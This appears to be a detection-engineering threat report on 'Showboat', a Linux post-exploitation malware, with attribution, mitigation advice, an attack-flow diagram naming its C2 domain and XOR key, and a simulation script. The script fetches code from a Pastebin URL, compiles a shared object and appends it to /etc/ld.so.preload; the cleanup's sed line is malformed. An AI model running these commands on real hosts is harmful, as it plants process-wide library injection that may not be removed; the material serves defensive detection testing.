Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Showboat is a modular Linux post-exploitation framework built for AMD x86-64 environments. Active since mid-2022, it is designed to maintain quiet, long-term access inside compromised networks. The malware uses advanced evasion methods, including XOR encryption and abuse of the dynamic linker to conceal malicious processes.
Investigation
The investigation traced the command-and-control infrastructure to Chengdu, China, which, together with the observed tactics, techniques, and procedures, suggests links to PRC-aligned threat actors. Technical analysis showed the malware relies on a hardcoded XOR key to decrypt its configuration and abuses ld.so.preload to achieve stealth on infected systems.
Mitigation
Defenders should watch for unauthorized changes to /etc/ld.so.preload and suspicious use of the gcc compiler on production Linux hosts. It is also recommended to deploy network monitoring capable of identifying beaconing behavior, even when timing is randomized, and to use integrity monitoring for critical system libraries.
Response
If Showboat activity is detected, isolate the affected Linux systems from the network immediately to stop further command-and-control traffic. Perform memory forensics to identify injected shared objects and carry out a full audit of system settings and scheduled tasks to confirm that all persistence mechanisms have been removed.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware_entity fill:#ff9999 classDef network fill:#99ff99 %% Node Definitions %% Stage 1: Initial Configuration action_decryption["<b>Action</b> – <b>T1027: Obfuscated Files or Information</b><br/>Retrieves encrypted configuration via XOR<br/>using hardcoded key: look me, AV!<br/>Target: telecom.webredirect[.]org"] class action_decryption action %% Stage 2: C2 and Exfiltration malware_showboat["<b>Malware</b> – <b>Showboat</b><br/>Post-exploitation lifecycle agent"] class malware_showboat malware_entity action_beaconing["<b>Action</b> – <b>T1071: Application Layer Protocol</b><br/>Establishes C2 via heartbeat beacons<br/>Uses randomized sleep intervals to evade detection"] class action_beaconing action action_exfiltration["<b>Action</b> – <b>T1029: Scheduled Transfer</b><br/>Bundles host info and screenshots into JSON<br/>Encrypts and Base64 encodes data<br/>Uses steganography in PNG fields for evasion"] class action_exfiltration action %% Stage 3: Stealth and Persistence action_fetch_source["<b>Action</b> – <b>T1105: Ingress Tool Transfer</b><br/>Fetches C source file ukpkmkk.c<br/>Source: Pastebin URL"] class action_fetch_source action action_compile["<b>Action</b> – <b>T1059: Command and Scripting Interpreter</b><br/>Compiles ukpkmkk.c locally on victim machine<br/>Generates malicious shared library"] class action_compile action action_hijack["<b>Action</b> – <b>T1574.006: Hijack Execution Flow: Dynamic Linker Hijacking</b><br/>Uses ld.so.preload mechanism<br/>Injects /tmp/ukpkmkk.so into processes"] class action_hijack action action_stealth["<b>Action</b> – <b>T1564: Hide Artifacts</b><br/>Hooks system calls like readdir()<br/>Hides processes from ps and top using filter list"] class action_stealth action %% Connections malware_showboat –>|executes| action_decryption action_decryption –>|establishes| action_beaconing action_beaconing –>|exfiltrates_data| action_exfiltration action_exfiltration –>|triggers_hide_command| action_fetch_source action_fetch_source –>|leads_to| action_compile action_compile –>|produces_library| action_hijack action_hijack –>|achieves| action_stealth %% Final mapping of the flow action_stealth -.->|maintains| malware_showboat "
Attack Flow
Detections
Suspicious Pastebin Domain Communications Attempt (via proxy)
View
Remote File Upload / Download via Standard Tools (via cmdline)
View
Detection of Showboat Malware Beacon Activity [Linux Process Creation]
View
Detect Showboat Malware Activity – ld.so.preload Modification and Source File Fetching [Linux Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The attacker aims to establish persistent interception of system calls. They begin by downloading a malicious C source file from a Pastebin raw URL using
curl. Once downloaded, they usegccwith the-sharedand-fPICflags to compile the source into a shared object file namedmalicious.so. Finally, they attempt to achieve persistence by appending the path of this library to/etc/ld.so.preload. This sequence is designed to inject the malicious library into every process on the system. -
Regression Test Script:
#!/bin/bash # Simulation of Showboat Malware TTPs # 1. Simulate fetching C source from Pastebin # Note: Using a real raw pastebin link (mocked for logic) or simulating the string echo "Creating mock pastebin download simulation..." echo 'void __attribute__((constructor)) init() {}' > fake_malware.c # This command triggers the 'selection_fetch' part of the rule curl -s https://pastebin.com/raw/example_id -o fake_malware.c # 2. Simulate compilation of a shared object # This command triggers the 'selection_compile' part of the rule # (selection_fetch AND selection_compile) gcc -shared -fPIC -o /tmp/malicious.so fake_malware.c # 3. Simulate ld.so.preload modification # This command triggers the 'selection_preload' part of the rule echo "/tmp/malicious.so" | sudo tee -a /etc/ld.so.preload echo "Simulation complete. Check SIEM for alerts." -
Cleanup Commands:
#!/bin/bash # Cleanup simulation artifacts # Remove the malicious library and source sudo rm -f /tmp/malicious.so rm -f fake_malware.c # Remove the entry from ld.so.preload (Requires caution) # This sed command removes the line containing /tmp/malicious.so sudo sed -i '//tmp/malicious.so/d' /etc/ld.so.preload echo "Cleanup complete."